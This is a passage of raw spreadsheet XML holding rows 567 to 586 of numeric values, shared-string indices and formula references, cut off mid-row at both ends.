      <c r="F567" s="14"/>
      <c r="G567" s="29">
        <v>3.0</v>
      </c>
      <c r="H567" s="29">
        <v>338.0</v>
      </c>
      <c r="I567" s="29">
        <v>156809.0</v>
      </c>
      <c r="J567" s="15"/>
      <c r="K567" s="15"/>
      <c r="L567" s="15"/>
      <c r="M567" s="15"/>
      <c r="N567" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O567" s="29">
        <v>2.0</v>
      </c>
      <c r="P567" s="29">
        <v>7.0</v>
      </c>
      <c r="Q567" s="15"/>
      <c r="R567" s="15"/>
      <c r="S567" s="15"/>
      <c r="T567" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U567" s="5"/>
      <c r="V567" s="5"/>
      <c r="W567" s="47"/>
      <c r="X567" s="45"/>
      <c r="Y567" s="45"/>
      <c r="Z567" s="38" t="s">
        <v>2739</v>
      </c>
      <c r="AA567" s="39" t="s">
        <v>2740</v>
      </c>
      <c r="AB567" s="38" t="s">
        <v>2741</v>
      </c>
      <c r="AC567" s="40">
        <v>193172.0</v>
      </c>
      <c r="AD567" s="5"/>
      <c r="AE567" s="14"/>
      <c r="AF567" s="14"/>
    </row>
    <row r="568">
      <c r="A568" s="6">
        <f t="shared" si="1"/>
        <v>0.1014311555</v>
      </c>
      <c r="B568" s="29">
        <v>1.0</v>
      </c>
      <c r="C568" s="15"/>
      <c r="D568" s="14"/>
      <c r="E568" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F568" s="14"/>
      <c r="G568" s="29">
        <v>5.0</v>
      </c>
      <c r="H568" s="29">
        <v>34387.0</v>
      </c>
      <c r="I568" s="29">
        <v>82081.0</v>
      </c>
      <c r="J568" s="15"/>
      <c r="K568" s="29">
        <v>5405.0</v>
      </c>
      <c r="L568" s="15"/>
      <c r="M568" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N568" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O568" s="29">
        <v>3.0</v>
      </c>
      <c r="P568" s="29">
        <v>1.0</v>
      </c>
      <c r="Q568" s="15"/>
      <c r="R568" s="15"/>
      <c r="S568" s="15"/>
      <c r="T568" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U568" s="5"/>
      <c r="V568" s="5"/>
      <c r="W568" s="47"/>
      <c r="X568" s="45"/>
      <c r="Y568" s="45"/>
      <c r="Z568" s="38" t="s">
        <v>2742</v>
      </c>
      <c r="AA568" s="39" t="s">
        <v>2743</v>
      </c>
      <c r="AB568" s="38" t="s">
        <v>2744</v>
      </c>
      <c r="AC568" s="40">
        <v>95233.0</v>
      </c>
      <c r="AD568" s="5"/>
      <c r="AE568" s="14"/>
      <c r="AF568" s="14"/>
    </row>
    <row r="569">
      <c r="A569" s="6">
        <f t="shared" si="1"/>
        <v>0.1572631598</v>
      </c>
      <c r="B569" s="29">
        <v>1.0</v>
      </c>
      <c r="C569" s="29">
        <v>193561.0</v>
      </c>
      <c r="D569" s="14"/>
      <c r="E569" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F569" s="14"/>
      <c r="G569" s="29">
        <v>1.0</v>
      </c>
      <c r="H569" s="29">
        <v>864.0</v>
      </c>
      <c r="I569" s="29">
        <v>186466.0</v>
      </c>
      <c r="J569" s="15"/>
      <c r="K569" s="29">
        <v>186466.0</v>
      </c>
      <c r="L569" s="15"/>
      <c r="M569" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N569" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O569" s="29">
        <v>1.0</v>
      </c>
      <c r="P569" s="29">
        <v>3.0</v>
      </c>
      <c r="Q569" s="15"/>
      <c r="R569" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S569" s="15"/>
      <c r="T569" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U569" s="5"/>
      <c r="V569" s="5"/>
      <c r="W569" s="47"/>
      <c r="X569" s="45"/>
      <c r="Y569" s="45"/>
      <c r="Z569" s="38" t="s">
        <v>2745</v>
      </c>
      <c r="AA569" s="39" t="s">
        <v>2746</v>
      </c>
      <c r="AB569" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC569" s="40">
        <v>193558.0</v>
      </c>
      <c r="AD569" s="5"/>
      <c r="AE569" s="14"/>
      <c r="AF569" s="14"/>
    </row>
    <row r="570">
      <c r="A570" s="6">
        <f t="shared" si="1"/>
        <v>0.3072121275</v>
      </c>
      <c r="B570" s="29">
        <v>1.0</v>
      </c>
      <c r="C570" s="29">
        <v>226375.0</v>
      </c>
      <c r="D570" s="14"/>
      <c r="E570" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F570" s="14"/>
      <c r="G570" s="29">
        <v>0.0</v>
      </c>
      <c r="H570" s="29">
        <v>138.0</v>
      </c>
      <c r="I570" s="29">
        <v>227764.0</v>
      </c>
      <c r="J570" s="15"/>
      <c r="K570" s="29">
        <v>6253.0</v>
      </c>
      <c r="L570" s="15"/>
      <c r="M570" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N570" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O570" s="29">
        <v>1.0</v>
      </c>
      <c r="P570" s="29">
        <v>0.0</v>
      </c>
      <c r="Q570" s="15"/>
      <c r="R570" s="15"/>
      <c r="S570" s="15"/>
      <c r="T570" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U570" s="5"/>
      <c r="V570" s="5"/>
      <c r="W570" s="47"/>
      <c r="X570" s="45"/>
      <c r="Y570" s="45"/>
      <c r="Z570" s="38" t="s">
        <v>2747</v>
      </c>
      <c r="AA570" s="39" t="s">
        <v>2748</v>
      </c>
      <c r="AB570" s="38" t="s">
        <v>1083</v>
      </c>
      <c r="AC570" s="40">
        <v>226372.0</v>
      </c>
      <c r="AD570" s="5"/>
      <c r="AE570" s="14"/>
      <c r="AF570" s="14"/>
    </row>
    <row r="571">
      <c r="A571" s="6">
        <f t="shared" si="1"/>
        <v>0.9526590615</v>
      </c>
      <c r="B571" s="29">
        <v>1.0</v>
      </c>
      <c r="C571" s="29">
        <v>117174.0</v>
      </c>
      <c r="D571" s="14"/>
      <c r="E571" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F571" s="14"/>
      <c r="G571" s="29">
        <v>2.0</v>
      </c>
      <c r="H571" s="29">
        <v>2066.0</v>
      </c>
      <c r="I571" s="29">
        <v>103671.0</v>
      </c>
      <c r="J571" s="15"/>
      <c r="K571" s="29">
        <v>86652.0</v>
      </c>
      <c r="L571" s="15"/>
      <c r="M571" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N571" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O571" s="29">
        <v>1.0</v>
      </c>
      <c r="P571" s="29">
        <v>6.0</v>
      </c>
      <c r="Q571" s="15"/>
      <c r="R571" s="15"/>
      <c r="S571" s="15"/>
      <c r="T571" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U571" s="5"/>
      <c r="V571" s="5"/>
      <c r="W571" s="47"/>
      <c r="X571" s="45"/>
      <c r="Y571" s="45"/>
      <c r="Z571" s="38" t="s">
        <v>2749</v>
      </c>
      <c r="AA571" s="39" t="s">
        <v>2750</v>
      </c>
      <c r="AB571" s="38" t="s">
        <v>2751</v>
      </c>
      <c r="AC571" s="40">
        <v>117170.0</v>
      </c>
      <c r="AD571" s="5"/>
      <c r="AE571" s="14"/>
      <c r="AF571" s="14"/>
    </row>
    <row r="572">
      <c r="A572" s="6">
        <f t="shared" si="1"/>
        <v>0.1692647968</v>
      </c>
      <c r="B572" s="29">
        <v>1.0</v>
      </c>
      <c r="C572" s="15"/>
      <c r="D572" s="14"/>
      <c r="E572" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F572" s="14"/>
      <c r="G572" s="29">
        <v>0.0</v>
      </c>
      <c r="H572" s="29">
        <v>363.0</v>
      </c>
      <c r="I572" s="29">
        <v>69152.0</v>
      </c>
      <c r="J572" s="15"/>
      <c r="K572" s="29">
        <v>69152.0</v>
      </c>
      <c r="L572" s="15"/>
      <c r="M572" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N572" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O572" s="29">
        <v>1.0</v>
      </c>
      <c r="P572" s="29">
        <v>2.0</v>
      </c>
      <c r="Q572" s="15"/>
      <c r="R572" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S572" s="15"/>
      <c r="T572" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U572" s="5"/>
      <c r="V572" s="5"/>
      <c r="W572" s="47"/>
      <c r="X572" s="45"/>
      <c r="Y572" s="45"/>
      <c r="Z572" s="38" t="s">
        <v>2752</v>
      </c>
      <c r="AA572" s="39" t="s">
        <v>2753</v>
      </c>
      <c r="AB572" s="38" t="s">
        <v>1114</v>
      </c>
      <c r="AC572" s="40">
        <v>230595.0</v>
      </c>
      <c r="AD572" s="5"/>
      <c r="AE572" s="14"/>
      <c r="AF572" s="14"/>
    </row>
    <row r="573">
      <c r="A573" s="6">
        <f t="shared" si="1"/>
        <v>0.6225207815</v>
      </c>
      <c r="B573" s="29">
        <v>1.0</v>
      </c>
      <c r="C573" s="29">
        <v>71278.0</v>
      </c>
      <c r="D573" s="14"/>
      <c r="E573" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F573" s="14"/>
      <c r="G573" s="29">
        <v>3.0</v>
      </c>
      <c r="H573" s="29">
        <v>1047.0</v>
      </c>
      <c r="I573" s="29">
        <v>56842.0</v>
      </c>
      <c r="J573" s="15"/>
      <c r="K573" s="15"/>
      <c r="L573" s="15"/>
      <c r="M573" s="14"/>
      <c r="N573" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O573" s="29">
        <v>1.0</v>
      </c>
      <c r="P573" s="29">
        <v>1.0</v>
      </c>
      <c r="Q573" s="15"/>
      <c r="R573" s="15"/>
      <c r="S573" s="15"/>
      <c r="T573" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U573" s="5"/>
      <c r="V573" s="5"/>
      <c r="W573" s="47"/>
      <c r="X573" s="45"/>
      <c r="Y573" s="45"/>
      <c r="Z573" s="38" t="s">
        <v>2754</v>
      </c>
      <c r="AA573" s="39" t="s">
        <v>2755</v>
      </c>
      <c r="AB573" s="38" t="s">
        <v>2756</v>
      </c>
      <c r="AC573" s="40">
        <v>68916.0</v>
      </c>
      <c r="AD573" s="5"/>
      <c r="AE573" s="14"/>
      <c r="AF573" s="14"/>
    </row>
    <row r="574">
      <c r="A574" s="6">
        <f t="shared" si="1"/>
        <v>0.4494119794</v>
      </c>
      <c r="B574" s="29">
        <v>1.0</v>
      </c>
      <c r="C574" s="15"/>
      <c r="D574" s="14"/>
      <c r="E574" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F574" s="14"/>
      <c r="G574" s="29">
        <v>0.0</v>
      </c>
      <c r="H574" s="29">
        <v>81.0</v>
      </c>
      <c r="I574" s="29">
        <v>282810.0</v>
      </c>
      <c r="J574" s="15"/>
      <c r="K574" s="15"/>
      <c r="L574" s="15"/>
      <c r="M574" s="15"/>
      <c r="N574" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O574" s="29">
        <v>0.0</v>
      </c>
      <c r="P574" s="29">
        <v>2.0</v>
      </c>
      <c r="Q574" s="15"/>
      <c r="R574" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S574" s="15"/>
      <c r="T574" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U574" s="5"/>
      <c r="V574" s="5"/>
      <c r="W574" s="47"/>
      <c r="X574" s="45"/>
      <c r="Y574" s="45"/>
      <c r="Z574" s="38" t="s">
        <v>2757</v>
      </c>
      <c r="AA574" s="39" t="s">
        <v>2758</v>
      </c>
      <c r="AB574" s="38" t="s">
        <v>1788</v>
      </c>
      <c r="AC574" s="40">
        <v>264826.0</v>
      </c>
      <c r="AD574" s="5"/>
      <c r="AE574" s="14"/>
      <c r="AF574" s="14"/>
    </row>
    <row r="575">
      <c r="A575" s="6">
        <f t="shared" si="1"/>
        <v>0.7673538464</v>
      </c>
      <c r="B575" s="29">
        <v>1.0</v>
      </c>
      <c r="C575" s="29">
        <v>251090.0</v>
      </c>
      <c r="D575" s="14"/>
      <c r="E575" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F575" s="14"/>
      <c r="G575" s="29">
        <v>0.0</v>
      </c>
      <c r="H575" s="29">
        <v>265.0</v>
      </c>
      <c r="I575" s="29">
        <v>199648.0</v>
      </c>
      <c r="J575" s="15"/>
      <c r="K575" s="15"/>
      <c r="L575" s="15"/>
      <c r="M575" s="14"/>
      <c r="N575" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O575" s="29">
        <v>2.0</v>
      </c>
      <c r="P575" s="29">
        <v>1.0</v>
      </c>
      <c r="Q575" s="15"/>
      <c r="R575" s="15"/>
      <c r="S575" s="15"/>
      <c r="T575" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U575" s="5"/>
      <c r="V575" s="5"/>
      <c r="W575" s="47"/>
      <c r="X575" s="45"/>
      <c r="Y575" s="45"/>
      <c r="Z575" s="38" t="s">
        <v>2759</v>
      </c>
      <c r="AA575" s="39" t="s">
        <v>2760</v>
      </c>
      <c r="AB575" s="38" t="s">
        <v>2761</v>
      </c>
      <c r="AC575" s="40">
        <v>251078.0</v>
      </c>
      <c r="AD575" s="5"/>
      <c r="AE575" s="14"/>
      <c r="AF575" s="14"/>
    </row>
    <row r="576">
      <c r="A576" s="6">
        <f t="shared" si="1"/>
        <v>0.2097503441</v>
      </c>
      <c r="B576" s="29">
        <v>1.0</v>
      </c>
      <c r="C576" s="29">
        <v>6697.0</v>
      </c>
      <c r="D576" s="14"/>
      <c r="E576" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F576" s="14"/>
      <c r="G576" s="29">
        <v>14.0</v>
      </c>
      <c r="H576" s="29">
        <v>3794.0</v>
      </c>
      <c r="I576" s="29">
        <v>971.0</v>
      </c>
      <c r="J576" s="15"/>
      <c r="K576" s="15"/>
      <c r="L576" s="15"/>
      <c r="M576" s="15"/>
      <c r="N576" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O576" s="29">
        <v>5.0</v>
      </c>
      <c r="P576" s="29">
        <v>3.0</v>
      </c>
      <c r="Q576" s="15"/>
      <c r="R576" s="15"/>
      <c r="S576" s="15"/>
      <c r="T576" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U576" s="5"/>
      <c r="V576" s="5"/>
      <c r="W576" s="47"/>
      <c r="X576" s="45"/>
      <c r="Y576" s="45"/>
      <c r="Z576" s="38" t="s">
        <v>2762</v>
      </c>
      <c r="AA576" s="39" t="s">
        <v>2763</v>
      </c>
      <c r="AB576" s="38" t="s">
        <v>2764</v>
      </c>
      <c r="AC576" s="40">
        <v>6682.0</v>
      </c>
      <c r="AD576" s="5"/>
      <c r="AE576" s="14"/>
      <c r="AF576" s="14"/>
    </row>
    <row r="577">
      <c r="A577" s="6">
        <f t="shared" si="1"/>
        <v>0.9944634441</v>
      </c>
      <c r="B577" s="29">
        <v>1.0</v>
      </c>
      <c r="C577" s="15"/>
      <c r="D577" s="14"/>
      <c r="E577" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F577" s="14"/>
      <c r="G577" s="29">
        <v>0.0</v>
      </c>
      <c r="H577" s="29">
        <v>125.0</v>
      </c>
      <c r="I577" s="29">
        <v>103570.0</v>
      </c>
      <c r="J577" s="15"/>
      <c r="K577" s="29">
        <v>132707.0</v>
      </c>
      <c r="L577" s="15"/>
      <c r="M577" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N577" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O577" s="29">
        <v>0.0</v>
      </c>
      <c r="P577" s="29">
        <v>4.0</v>
      </c>
      <c r="Q577" s="15"/>
      <c r="R577" s="15"/>
      <c r="S577" s="15"/>
      <c r="T577" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U577" s="5"/>
      <c r="V577" s="5"/>
      <c r="W577" s="47"/>
      <c r="X577" s="45"/>
      <c r="Y577" s="45"/>
      <c r="Z577" s="38" t="s">
        <v>2765</v>
      </c>
      <c r="AA577" s="39" t="s">
        <v>2766</v>
      </c>
      <c r="AB577" s="38" t="s">
        <v>2767</v>
      </c>
      <c r="AC577" s="40">
        <v>149644.0</v>
      </c>
      <c r="AD577" s="5"/>
      <c r="AE577" s="14"/>
      <c r="AF577" s="14"/>
    </row>
    <row r="578">
      <c r="A578" s="6">
        <f t="shared" si="1"/>
        <v>0.6280809144</v>
      </c>
      <c r="B578" s="29">
        <v>1.0</v>
      </c>
      <c r="C578" s="29">
        <v>4537.0</v>
      </c>
      <c r="D578" s="14"/>
      <c r="E578" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F578" s="14"/>
      <c r="G578" s="29">
        <v>22.0</v>
      </c>
      <c r="H578" s="29">
        <v>1704.0</v>
      </c>
      <c r="I578" s="29">
        <v>997.0</v>
      </c>
      <c r="J578" s="15"/>
      <c r="K578" s="29">
        <v>33.0</v>
      </c>
      <c r="L578" s="15"/>
      <c r="M578" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N578" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O578" s="29">
        <v>2.0</v>
      </c>
      <c r="P578" s="29">
        <v>1.0</v>
      </c>
      <c r="Q578" s="15"/>
      <c r="R578" s="15"/>
      <c r="S578" s="15"/>
      <c r="T578" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U578" s="5"/>
      <c r="V578" s="5"/>
      <c r="W578" s="47"/>
      <c r="X578" s="45"/>
      <c r="Y578" s="45"/>
      <c r="Z578" s="38" t="s">
        <v>2768</v>
      </c>
      <c r="AA578" s="39" t="s">
        <v>2769</v>
      </c>
      <c r="AB578" s="38" t="s">
        <v>2038</v>
      </c>
      <c r="AC578" s="40">
        <v>4536.0</v>
      </c>
      <c r="AD578" s="5"/>
      <c r="AE578" s="14"/>
      <c r="AF578" s="14"/>
    </row>
    <row r="579">
      <c r="A579" s="6">
        <f t="shared" si="1"/>
        <v>0.6238654926</v>
      </c>
      <c r="B579" s="29">
        <v>1.0</v>
      </c>
      <c r="C579" s="15"/>
      <c r="D579" s="14"/>
      <c r="E579" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F579" s="14"/>
      <c r="G579" s="29">
        <v>-1.0</v>
      </c>
      <c r="H579" s="29">
        <v>503.0</v>
      </c>
      <c r="I579" s="29">
        <v>29391.0</v>
      </c>
      <c r="J579" s="15"/>
      <c r="K579" s="29">
        <v>29391.0</v>
      </c>
      <c r="L579" s="15"/>
      <c r="M579" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N579" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O579" s="29">
        <v>2.0</v>
      </c>
      <c r="P579" s="29">
        <v>3.0</v>
      </c>
      <c r="Q579" s="15"/>
      <c r="R579" s="15"/>
      <c r="S579" s="15"/>
      <c r="T579" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U579" s="5"/>
      <c r="V579" s="5"/>
      <c r="W579" s="47"/>
      <c r="X579" s="45"/>
      <c r="Y579" s="45"/>
      <c r="Z579" s="38" t="s">
        <v>2770</v>
      </c>
      <c r="AA579" s="39" t="s">
        <v>2771</v>
      </c>
      <c r="AB579" s="38" t="s">
        <v>2772</v>
      </c>
      <c r="AC579" s="40">
        <v>131661.0</v>
      </c>
      <c r="AD579" s="5"/>
      <c r="AE579" s="14"/>
      <c r="AF579" s="14"/>
    </row>
    <row r="580">
      <c r="A580" s="6">
        <f t="shared" si="1"/>
        <v>0.5688755995</v>
      </c>
      <c r="B580" s="29">
        <v>1.0</v>
      </c>
      <c r="C580" s="29">
        <v>127046.0</v>
      </c>
      <c r="D580" s="14"/>
      <c r="E580" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F580" s="14"/>
      <c r="G580" s="29">
        <v>1.0</v>
      </c>
      <c r="H580" s="29">
        <v>163.0</v>
      </c>
      <c r="I580" s="29">
        <v>102283.0</v>
      </c>
      <c r="J580" s="15"/>
      <c r="K580" s="29">
        <v>102283.0</v>
      </c>
      <c r="L580" s="15"/>
      <c r="M580" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N580" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O580" s="29">
        <v>2.0</v>
      </c>
      <c r="P580" s="29">
        <v>1.0</v>
      </c>
      <c r="Q580" s="15"/>
      <c r="R580" s="15"/>
      <c r="S580" s="15"/>
      <c r="T580" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U580" s="5"/>
      <c r="V580" s="5"/>
      <c r="W580" s="47"/>
      <c r="X580" s="45"/>
      <c r="Y580" s="45"/>
      <c r="Z580" s="38" t="s">
        <v>2773</v>
      </c>
      <c r="AA580" s="39" t="s">
        <v>2774</v>
      </c>
      <c r="AB580" s="38" t="s">
        <v>2775</v>
      </c>
      <c r="AC580" s="40">
        <v>127030.0</v>
      </c>
      <c r="AD580" s="5"/>
      <c r="AE580" s="14"/>
      <c r="AF580" s="14"/>
    </row>
    <row r="581">
      <c r="A581" s="6">
        <f t="shared" si="1"/>
        <v>0.7419563594</v>
      </c>
      <c r="B581" s="29">
        <v>1.0</v>
      </c>
      <c r="C581" s="15"/>
      <c r="D581" s="14"/>
      <c r="E581" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F581" s="14"/>
      <c r="G581" s="29">
        <v>1.0</v>
      </c>
      <c r="H581" s="29">
        <v>10600.0</v>
      </c>
      <c r="I581" s="29">
        <v>238301.0</v>
      </c>
      <c r="J581" s="15"/>
      <c r="K581" s="15"/>
      <c r="L581" s="15"/>
      <c r="M581" s="15"/>
      <c r="N581" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O581" s="29">
        <v>2.0</v>
      </c>
      <c r="P581" s="29">
        <v>0.0</v>
      </c>
      <c r="Q581" s="15"/>
      <c r="R581" s="15"/>
      <c r="S581" s="15"/>
      <c r="T581" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U581" s="5"/>
      <c r="V581" s="5"/>
      <c r="W581" s="47"/>
      <c r="X581" s="45"/>
      <c r="Y581" s="45"/>
      <c r="Z581" s="38" t="s">
        <v>2776</v>
      </c>
      <c r="AA581" s="39" t="s">
        <v>2777</v>
      </c>
      <c r="AB581" s="38" t="s">
        <v>2778</v>
      </c>
      <c r="AC581" s="40">
        <v>234601.0</v>
      </c>
      <c r="AD581" s="5"/>
      <c r="AE581" s="14"/>
      <c r="AF581" s="14"/>
    </row>
    <row r="582">
      <c r="A582" s="6">
        <f t="shared" si="1"/>
        <v>0.525790899</v>
      </c>
      <c r="B582" s="29">
        <v>1.0</v>
      </c>
      <c r="C582" s="15"/>
      <c r="D582" s="14"/>
      <c r="E582" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F582" s="14"/>
      <c r="G582" s="29">
        <v>1.0</v>
      </c>
      <c r="H582" s="29">
        <v>600.0</v>
      </c>
      <c r="I582" s="29">
        <v>246744.0</v>
      </c>
      <c r="J582" s="15"/>
      <c r="K582" s="29">
        <v>246744.0</v>
      </c>
      <c r="L582" s="15"/>
      <c r="M582" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N582" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O582" s="29">
        <v>1.0</v>
      </c>
      <c r="P582" s="29">
        <v>1.0</v>
      </c>
      <c r="Q582" s="15"/>
      <c r="R582" s="15"/>
      <c r="S582" s="15"/>
      <c r="T582" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U582" s="5"/>
      <c r="V582" s="5"/>
      <c r="W582" s="47"/>
      <c r="X582" s="45"/>
      <c r="Y582" s="45"/>
      <c r="Z582" s="38" t="s">
        <v>2779</v>
      </c>
      <c r="AA582" s="39" t="s">
        <v>2780</v>
      </c>
      <c r="AB582" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC582" s="40">
        <v>241672.0</v>
      </c>
      <c r="AD582" s="5"/>
      <c r="AE582" s="14"/>
      <c r="AF582" s="14"/>
    </row>
    <row r="583">
      <c r="A583" s="6">
        <f t="shared" si="1"/>
        <v>0.7720019892</v>
      </c>
      <c r="B583" s="29">
        <v>1.0</v>
      </c>
      <c r="C583" s="29">
        <v>203178.0</v>
      </c>
      <c r="D583" s="14"/>
      <c r="E583" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F583" s="14"/>
      <c r="G583" s="29">
        <v>1.0</v>
      </c>
      <c r="H583" s="29">
        <v>1596.0</v>
      </c>
      <c r="I583" s="29">
        <v>198524.0</v>
      </c>
      <c r="J583" s="15"/>
      <c r="K583" s="29">
        <v>198524.0</v>
      </c>
      <c r="L583" s="15"/>
      <c r="M583" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N583" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O583" s="29">
        <v>1.0</v>
      </c>
      <c r="P583" s="29">
        <v>0.0</v>
      </c>
      <c r="Q583" s="15"/>
      <c r="R583" s="15"/>
      <c r="S583" s="15"/>
      <c r="T583" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U583" s="5"/>
      <c r="V583" s="5"/>
      <c r="W583" s="47"/>
      <c r="X583" s="45"/>
      <c r="Y583" s="45"/>
      <c r="Z583" s="38" t="s">
        <v>2781</v>
      </c>
      <c r="AA583" s="39" t="s">
        <v>2782</v>
      </c>
      <c r="AB583" s="38" t="s">
        <v>2783</v>
      </c>
      <c r="AC583" s="40">
        <v>202900.0</v>
      </c>
      <c r="AD583" s="5"/>
      <c r="AE583" s="14"/>
      <c r="AF583" s="14"/>
    </row>
    <row r="584">
      <c r="A584" s="6">
        <f t="shared" si="1"/>
        <v>0.980606957</v>
      </c>
      <c r="B584" s="29">
        <v>1.0</v>
      </c>
      <c r="C584" s="15"/>
      <c r="D584" s="14"/>
      <c r="E584" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F584" s="14"/>
      <c r="G584" s="29">
        <v>0.0</v>
      </c>
      <c r="H584" s="29">
        <v>19.0</v>
      </c>
      <c r="I584" s="29">
        <v>186651.0</v>
      </c>
      <c r="J584" s="15"/>
      <c r="K584" s="29">
        <v>6253.0</v>
      </c>
      <c r="L584" s="15"/>
      <c r="M584" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N584" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O584" s="29">
        <v>0.0</v>
      </c>
      <c r="P584" s="29">
        <v>1.0</v>
      </c>
      <c r="Q584" s="15"/>
      <c r="R584" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S584" s="15"/>
      <c r="T584" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U584" s="5"/>
      <c r="V584" s="5"/>
      <c r="W584" s="47"/>
      <c r="X584" s="45"/>
      <c r="Y584" s="45"/>
      <c r="Z584" s="38" t="s">
        <v>2784</v>
      </c>
      <c r="AA584" s="39" t="s">
        <v>2785</v>
      </c>
      <c r="AB584" s="38" t="s">
        <v>2786</v>
      </c>
      <c r="AC584" s="40">
        <v>271252.0</v>
      </c>
      <c r="AD584" s="5"/>
      <c r="AE584" s="14"/>
      <c r="AF584" s="14"/>
    </row>
    <row r="585">
      <c r="A585" s="6">
        <f t="shared" si="1"/>
        <v>0.6619671591</v>
      </c>
      <c r="B585" s="29">
        <v>1.0</v>
      </c>
      <c r="C585" s="15"/>
      <c r="D585" s="14"/>
      <c r="E585" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F585" s="14"/>
      <c r="G585" s="29">
        <v>2.0</v>
      </c>
      <c r="H585" s="29">
        <v>148.0</v>
      </c>
      <c r="I585" s="29">
        <v>63324.0</v>
      </c>
      <c r="J585" s="15"/>
      <c r="K585" s="15"/>
      <c r="L585" s="15"/>
      <c r="M585" s="15"/>
      <c r="N585" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O585" s="29">
        <v>0.0</v>
      </c>
      <c r="P585" s="29">
        <v>0.0</v>
      </c>
      <c r="Q585" s="15"/>
      <c r="R585" s="15"/>
      <c r="S585" s="15"/>
      <c r="T585" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U585" s="5"/>
      <c r="V585" s="5"/>
      <c r="W585" s="47"/>
      <c r="X585" s="45"/>
      <c r="Y585" s="45"/>
      <c r="Z585" s="38" t="s">
        <v>2787</v>
      </c>
      <c r="AA585" s="39" t="s">
        <v>2788</v>
      </c>
      <c r="AB585" s="38" t="s">
        <v>2789</v>
      </c>
      <c r="AC585" s="40">
        <v>249666.0</v>
      </c>
      <c r="AD585" s="5"/>
      <c r="AE585" s="14"/>
      <c r="AF585" s="14"/>
    </row>
    <row r="586">
      <c r="A586" s="6">
        <f t="shared" si="1"/>
        <v>0.5679259704</v>
      </c>
      <c r="B586" s="29">
        <v>1.0</v>
      </c>
      <c r="C586" s="15"/>
      <c r="D586" s="14"/>
      <c r="E586" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F586" s="14"/>
      <c r="G586" s="29">
        <v>7.0</v>
      </c>
      <c r="H586" s="29">
        <v>3059.0</v>
      </c>
      <c r="I586" s="29">
        <v>20266.0</v>
      </c>
      <c r="J586" s="15"/>
      <c r="K586" s="29">
        <v>20266.0</v>
      </c>
      <c r="L586" s="15"/>
      <c r="M586" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N586" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O586" s="29">
        <v>1.0</v>
      </c>
      <c r="P586" s="29">
        <v>7.0</v>
      </c>
      <c r="Q586" s="15"/>
      <c r="R586" s="15"/>
      <c r="S586" s="15"/>
      <c r="T586" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U586" s="5"/>
      <c r="V586" s="5"/>
      <c r="W586" s="47"/>
      <c r="X586" s="45"/>
      <c r="Y586" s="45"/>
      <c r="Z586" s="38" t="s">
        <v>2790</v>
      </c>
      <c r="AA586" s="39" t="s">
        <v>2791</v>
